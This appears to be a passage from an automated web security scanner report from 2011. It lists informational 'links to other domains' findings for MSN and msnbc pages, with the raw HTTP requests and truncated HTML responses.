http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalspecials.112.2o7.net/b/ss/msnportalspecials/1/H.1--NS/0
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/news/search?q=airport+weather+delays&form=msnhpm
http://www.bing.com/search?q=Bullying+and+hate+crime&go=&form=msnpop
http://www.bing.com/search?q=Ines+Sainz+at+super+bowl+media+day&FORM=msnhpm
http://www.bing.com/search?q=New+Jersey+Anti-Bullying+Bill+of+Rights&go=&form=msnpop
http://www.bing.com/search?q=Seven+teens+arrested+in+kidnapping%2C+assault&go=&form=msnpop
http://www.bing.com/search?q=Upper+Darby+caught+on+video+hanging+student+on+fence+post&go=&form=msnpop
http://www.bing.com/search?q=cuckoo%27s+nest+hospital+and+remains&form=msnhpm
http://www.bing.com/search?q=extreme+mental+anguish+chitwood&FORM=msnpop
http://www.bing.com/search?q=punxsutawney+phil+125th+anniversary&form=msnhpm
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomemsn.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296661290&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.msn.com%2FA-List%2FLifestyle%2FTeens-arrested-in-kidnapping-assault.aspx%3Fcp-documentid%3D27492385&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /A-List/Lifestyle/Teens-arrested-in-kidnapping-assault.aspx?cp-documentid=27492385 HTTP/1.1
Host: specials.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:41:30 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA49
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=c488e63ae1f04c1981395048358225f0; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=5623D3644DED4A14B9E91C4A3795B238; domain=.msn.com; expires=Sun, 21-Aug-2011 15:41:30 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 23212

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296661290&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.msn.com%2FA-List%2FLifestyle%2FTeens-arrested-in-kidnapping-assault.aspx%3Fcp-documentid%3D27492385&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomemsn.com/">Make msn.com your home page</a>
...[SNIP]...
<div><a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Seven+teens+arrested+in+kidnapping%2C+assault&go=&form=msnpop"><strong>
...[SNIP]...
<div>Seven Philadelphia area teens were arrested on kidnapping and assault charges Monday morning. According to police the students were caught on video assaulting a 14-year-old student. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Upper+Darby+caught+on+video+hanging+student+on+fence+post&go=&form=msnpop">Find out</a> what they did. The victim was not seriously injured, but according to police, is suffering. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=extreme+mental+anguish+chitwood&FORM=msnpop">How</a>
...[SNIP]...
<div>The toughest anti-bullying laws in the country, also known as ...Anti-Bullying Bill of Rights,... can be found in <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=New+Jersey+Anti-Bullying+Bill+of+Rights&go=&form=msnpop">this state</a>
...[SNIP]...
<div>There...s growing debate about whether bullying should be considered a hate crime. <a onclick="return Msn.Navigation.OpenNew(event,this)" href="http://www.bing.com/search?q=Bullying+and+hate+crime&go=&form=msnpop">Learn more.</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=cuckoo%27s+nest+hospital+and+remains&form=msnhpm">'Cuckoo's Nest' & remains</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=punxsutawney+phil+125th+anniversary&form=msnhpm">Punxsutawney Phil</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=Ines+Sainz+at+super+bowl+media+day&FORM=msnhpm">Ines Sainz...s outfit</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/news/search?q=airport+weather+delays&form=msnhpm">Airport weather delays</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

17.195. http://specials.msn.com/IEIncreaseFont_preview.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://specials.msn.com
Path:	/IEIncreaseFont_preview.aspx

Issue detail

The page was loaded from a URL containing a query string:

http://specials.msn.com/IEIncreaseFont_preview.aspx?cp-documentid=9149805&imageindex=1

The response contains the following links to other domains:

http://advertising.microsoft.com/msn/
http://download.live.com/?sku=messenger
http://insidemsn.wordpress.com/
http://mail.live.com/
http://msn.careerbuilder.com/?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home
http://msn.foxsports.com/
http://msn.foxsports.com/cfb
http://msn.foxsports.com/collegebasketball
http://msn.foxsports.com/fantasy
http://msn.foxsports.com/foxsoccer
http://msn.foxsports.com/mlb
http://msn.foxsports.com/nascar
http://msn.foxsports.com/nba
http://msn.foxsports.com/nfl
http://msn.foxsports.com/nhl
http://msn.foxsports.com/video?from=en-us_msnhp
http://msn.whitepages.com/
http://msnportalspecials.112.2o7.net/b/ss/msnportalspecials/1/H.1--NS/0
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.bing.com/videos/browse?from=en-us_msnhp
http://www.bltwy.com/
http://www.delish.com/
http://www.myhomemsn.com/
https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296661286&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.msn.com%2FIEIncreaseFont_preview.aspx%3Fcp-documentid%3D9149805%26imageindex%3D1&lc=1033&id=74314
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB

Request

GET /IEIncreaseFont_preview.aspx?cp-documentid=9149805&imageindex=1 HTTP/1.1
Host: specials.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:41:26 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA51
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=42e3c67bb8be4be8878fccf66ae971d9; domain=.msn.com; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=C712C5F97E774E37A206251C4EAEE732; domain=.msn.com; expires=Sun, 21-Aug-2011 15:41:26 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 17743

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml"><head><meta http-e
...[SNIP]...
<div><img src="http://msnportalspecials.112.2O7.net/b/ss/msnportalspecials/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&sc_cmp1=JS_MSN_Home">Careers & Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections & Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=11&ct=1296661286&rver=5.5.4177.0&wp=LBI&wreply=http:%2F%2Fspecials.msn.com%2FIEIncreaseFont_preview.aspx%3Fcp-documentid%3D9149805%26imageindex%3D1&lc=1033&id=74314" class="dMSNME_1">Sign in</a>
...[SNIP]...
</strong><a id="hplink" href="http://www.myhomemsn.com/">Make msn.com your home page</a>
...[SNIP]...
<li><a href="http://advertising.microsoft.com/msn/">Advertise on MSN</a>
...[SNIP]...

17.196. http://technolog.msnbc.msn.com/_news/2011/01/27/5936323-online-degrees-qualify-cat-to-be-your-shrink/from/toolbar previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://technolog.msnbc.msn.com
Path:	/_news/2011/01/27/5936323-online-degrees-qualify-cat-to-be-your-shrink/from/toolbar

Issue detail

The page was loaded from a URL containing a query string:

http://technolog.msnbc.msn.com/_news/2011/01/27/5936323-online-degrees-qualify-cat-to-be-your-shrink/from/toolbar?GT1=43001

The response contains the following links to other domains:

http://2million.newsvine.com/
http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js
http://alex-johnson.newsvine.com/
http://anker5905.newsvine.com/
http://aracfi.newsvine.com/
http://arsgoth.newsvine.com/
http://athima-chansanchai.newsvine.com/
http://baja-ahhh.newsvine.com/
http://beanathome.newsvine.com/
http://billmcc121.newsvine.com/
http://blogs.discovermagazine.com/badastronomy/
http://blogs.discovermagazine.com/cosmicvariance/
http://blogs.discovermagazine.com/loom/
http://blogs.nature.com/news/thegreatbeyond/
http://boyle.newsvine.com/
http://burr1.newsvine.com/
http://christinak.newsvine.com/
http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68
http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F
http://cooter2008.newsvine.com/
http://curmudgeons.blogspot.com/
http://dateline.msnbc.com/
http://davethedoubter.newsvine.com/
http://dnnash.newsvine.com/
http://doggysaywhat.newsvine.com/
http://donklaing.newsvine.com/
http://earthsky.org/
http://en.wikipedia.org/wiki/List_of_animals_with_fraudulent_diplomas
http://eurekalert.org/
http://gizmodo.com/5745108/how-a-cat-named-zoe-earned-several-advanced-degrees-and-became-a-psychotherapist
http://gregorvonk.newsvine.com/
http://hardball.msnbc.com/
http://helenaspopkin.newsvine.com/
http://help.live.com/help.aspx?project=tou&mkt=en-us
http://http/www.universetoday.com/
http://ingame.newsvine.com/
http://janedoe2992691.newsvine.com/
http://jonpierson.newsvine.com/
http://kane2250532.newsvine.com/
http://leslie2992828.newsvine.com/
http://lib.newsvine.com/Pierre/widgets/wetbar/wetbar.css
http://lib.newsvine.com/chrome/abstractmartinblog/base.css?v=23279
http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23279
http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-email.png
http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-feed.png
http://lib.newsvine.com/chrome/abstractmartinblog/images/msnbc-logo.png
http://lib.newsvine.com/chrome/abstractmartinblog/style.css?v=23279
http://lib.newsvine.com/chrome/technolog/style.css?v=23279
http://log.newsvine.com/poke.gif?x=0|26&get=c5936323&rand=1920274376&do=msnbc.msn.com&rf=http%3A%2F%2Ftoday.msnbc.msn.com%2Fid%2F41379178%2Fns%2Ftoday-entertainment%2F&ad=53:9:80;44::;56:27:108;53:9:80;86:86:270;87:87:209;53:9:80;86:86:270;87:87:209;53:9:80;86:86:270;87:87:209;50::
http://luric50.newsvine.com/
http://malexj.tk/6M
http://malexj.wordpress.com/
http://massmom.newsvine.com/
http://matthewterry1.newsvine.com/
http://medalguy.newsvine.com/
http://michaeloneal.newsvine.com/
http://michaelwann.newsvine.com/
http://missme21.newsvine.com/
http://msn.whitepages.com/
http://mtp.msnbc.com/
http://mulligan1-1.newsvine.com/
http://nasaengineer.com/
http://natalie-fl.newsvine.com/
http://news.discovery.com/
http://news.sciencemag.org/scienceinsider/
http://nightly.msnbc.com/
http://planetary.org/blog
http://platform.twitter.com/widgets.js
http://privacy.microsoft.com/en-us/default.aspx?SU=http://msnbc.msn.com/
http://rachel.msnbc.com/
http://realitychck.newsvine.com/
http://red23.newsvine.com/
http://redtape.msnbc.com/
http://redtape.newsvine.com/
http://rosagolijan.newsvine.com/
http://science.slashdot.org/
http://sd-strip.newsvine.com/
http://seedmagazine.com/
http://smartguy1985.newsvine.com/
http://spacefellowship.com/
http://steve442157720.newsvine.com/
http://stomachacidmonke.newsvine.com/
http://suzanne-choney.newsvine.com/
http://technolog2.newsvine.com/
http://tertertert.newsvine.com/
http://theberni.newsvine.com/
http://thefamily2.newsvine.com/
http://today.msnbc.com/
http://toddkenreck.newsvine.com/
http://tpuntoni.newsvine.com/
http://trublacque.newsvine.com/
http://trueslant.com/milesobrien/
http://tv.msnbc.com/
http://twitter.com/
http://twitter.com/HelenASPopkin
http://twitter.com/MichaelWann
http://twitter.com/rosa
http://twitter.com/share
http://twitter.com/windabenedetti
http://twitter.com/wjrothman
http://vet4u.newsvine.com/
http://vicky1790580.newsvine.com/
http://wbenedetti.newsvine.com/
http://winshear.newsvine.com/
http://www.bing.com/
http://www.bing.com/maps/default.aspx?FORM=MSNNAV
http://www.bing.com/shopping?FORM=SHOPH2
http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV
http://www.collectspace.com/
http://www.dailygrail.com/
http://www.delish.com/
http://www.dreichel.com/dr_zoe.htm
http://www.everyblock.com/
http://www.facebook.com/HelenASPopkin
http://www.facebook.com/RosaGolijanFanPage
http://www.facebook.com/home.php?id=1151660271
http://www.facebook.com/plugins/like.php?layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&href=http://www.facebook.com/pages/Technolog/108546889203630
http://www.facebook.com/plugins/like.php?layout=standard&show_faces=true&width=480&action=recommend&colorscheme=light&href=http://technolog.msnbc.msn.com/_news/2011/01/27/5936323-online-degrees-qualify-cat-to-be-your-shrink
http://www.facebook.com/todd.kenreck
http://www.geekpress.com/
http://www.habitablezone.com/space/
http://www.hobbyspace.com/
http://www.hotmail.com/
http://www.livescience.com/
http://www.nasaspaceflight.com/
http://www.nasawatch.com/
http://www.newsvine.com/
http://www.newsvine.com/_nv/cms/help/newUsers
http://www.newsvine.com/_nv/cms/info/privacyPolicy
http://www.outofthecradle.net/
http://www.polls.newsvine.com/_static/css/0238684eaf143e467a1dd70f7499f653cdc8b2d9.css?v=23279
http://www.polls.newsvine.com/_static/css/80c10ed69888de090d0a501f173fc431eaa24efa.css?v=23279
http://www.polls.newsvine.com/_static/js/007eb2f4e0ab5688a998bec9c2de18c62b55711a.js?v=23279
http://www.polls.newsvine.com/_static/js/642cd324ca8ed58d25f3d48637d36eb9aeeed9db.js?v=23279
http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2
http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js
http://www.polls.newsvine.com/_vine/images/_/b_postcomment.gif
http://www.polls.newsvine.com/_vine/images/_/b_posting.gif
http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif
http://www.polls.newsvine.com/_vine/images/_/b_star.gif
http://www.polls.newsvine.com/_vine/images/_/icon_stop_mini.gif
http://www.polls.newsvine.com/_vine/images/_/icon_track_mini.gif
http://www.polls.newsvine.com/_vine/images/__/spinner.gif
http://www.polls.newsvine.com/_vine/images/av/60x60/WBenedetti-689965150.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/alex-johnson-743865123.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/athima-chansanchai-1539646533.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/boyle-747955448.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/helenaspopkin-1308146463.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/michaelwann-318009268.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/redtape-920134022.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/rosagolijan-657197656.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/suzanne-choney-604078999.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/toddkenreck-1044151231.jpg
http://www.polls.newsvine.com/_vine/images/av/60x60/wjrothman-1049670252.jpg
http://www.polls.newsvine.com/_vine/images/users/600/helenaspopkin/5936454.jpg
http://www.polls.newsvine.com/_vine/images/users/nws/helenaspopkin/5936378.jpg
http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23279
http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23279
http://www.polls.newsvine.com/_vine/js/pierre?v=2673&lib=jquery&addwidgets=zinger,wetbar
http://www.popsci.com/
http://www.popularmechanics.com/
http://www.scidev.net/
http://www.scienceblog.com/cms/index.php
http://www.scienceblogs.com/
http://www.sciencenews.org/
http://www.scientificamerican.com/blog/observations/
http://www.signonsandiego.com/news/blogs/science-quest/
http://www.space.com/
http://www.spacedaily.com/
http://www.spacepolitics.com/
http://www.thecaseforpluto.com/
http://www.thecaseforpluto.com/cover.jpg
http://www.thespacereview.com/
http://www.transterrestrial.com/
http://www.twitter.com/MAlexJohnson
http://www.twitter.com/suzannechoney
http://www.unmannedspaceflight.com/
http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css
http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js
https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB
https://twitter.com/ToddKenreck
https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.msn.com

Request

GET /_news/2011/01/27/5936323-online-degrees-qualify-cat-to-be-your-shrink/from/toolbar?GT1=43001 HTTP/1.1
Host: technolog.msnbc.msn.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache/2.2.9 (Debian)
TCN: choice
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Location: http://technolog.msnbc.msn.com/_news/2011/01/27/5936323-online-degrees-qualify-cat-to-be-your-shrink?GT1=43001
Content-Type: text/html
Cache-Control: max-age=278
Date: Wed, 02 Feb 2011 15:42:13 GMT
Connection: close

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Technolog - Online degree
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="RSS" href="http://technolog.msnbc.msn.com/_feeds/rss2/author" />
<link class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2673&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/0238684eaf143e467a1dd70f7499f653cdc8b2d9.css?v=23279" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/007eb2f4e0ab5688a998bec9c2de18c62b55711a.js?v=23279"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/80c10ed69888de090d0a501f173fc431eaa24efa.css?v=23279" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/642cd324ca8ed58d25f3d48637d36eb9aeeed9db.js?v=23279"></script>
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/base.css?v=23279" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/style.css?v=23279" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/technolog/style.css?v=23279" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23279"></script>
...[SNIP]...
<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&get=c5936323&rand=1920274376&do=msnbc.msn.com&rf=http%3A%2F%2Ftoday.msnbc.msn.com%2Fid%2F41379178%2Fns%2Ftoday-entertainment%2F&ad=53:9:80;44::;56:27:108;53:9:80;86:86:270;87:87:209;53:9:80;86:86:270;87:87:209;53:9:80;86:86:270;87:87:209;50::" alt="" width="0" height="0" /></div>
...[SNIP]...
<li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a>
...[SNIP]...
<li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
...[SNIP]...
<li class="i7"><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li class="i9"><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li class="i18"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li class="i19"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps & Directions</a>
...[SNIP]...
<li class="i20"><a href="http://www.bing.com/travel/?cid=msn_nav_more&FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="bing" class="i3 bing"><a href="http://www.bing.com"><span>
...[SNIP]...
<li class="i2 show-today"><a href="http://today.msnbc.com/">TODAY</a></li>
           <li class="i3 show-nightly"><a href="http://nightly.msnbc.com/">Nightly News</a>
...[SNIP]...
<li class="i4 show-mtp"><a href="http://mtp.msnbc.com/">Meet the Press</a>
...[SNIP]...
<li class="i5 show-dateline"><a href="http://dateline.msnbc.com/">Dateline</a>
...[SNIP]...
<li class="i6 show-maddow"><a href="http://rachel.msnbc.com/">Maddow</a>
...[SNIP]...
<li class="i8 show-hardball"><a href="http://hardball.msnbc.com/">Hardball</a>
...[SNIP]...
<li class="i9 show-msnbc"><a href="http://tv.msnbc.com/">msnbc tv</a>
...[SNIP]...
<li class="i10 site-newsvine"><a href="http://www.newsvine.com/">Newsvine</a>
...[SNIP]...
<li class="i11 site-everyblock"><a href="http://www.everyblock.com/">EveryBlock</a>
...[SNIP]...
<li class="email_subscribe_option"><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.msn.com"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-email.png" width="19" height="18" alt="Icons Email"> Receive e-mail updates</a>
...[SNIP]...
</div><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.msn.com">change this</a>
...[SNIP]...
<div class="spinner hide"><img src="http://www.polls.newsvine.com/_vine/images/__/spinner.gif" width="16" height="16" alt="Loading" /> Saving...</div>
...[SNIP]...
<a href="http://technolog.msnbc.msn.com/_feeds/rss2/author"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-feed.png" width="18" height="18" alt="Icons Feed"> Subscribe to RSS</a>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=button_count&show_faces=false&width=90&action=like&colorscheme=light&href=http://www.facebook.com/pages/Technolog/108546889203630" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:90px; height:20px"></iframe>
...[SNIP]...

<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23279"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23279"></script>
...[SNIP]...
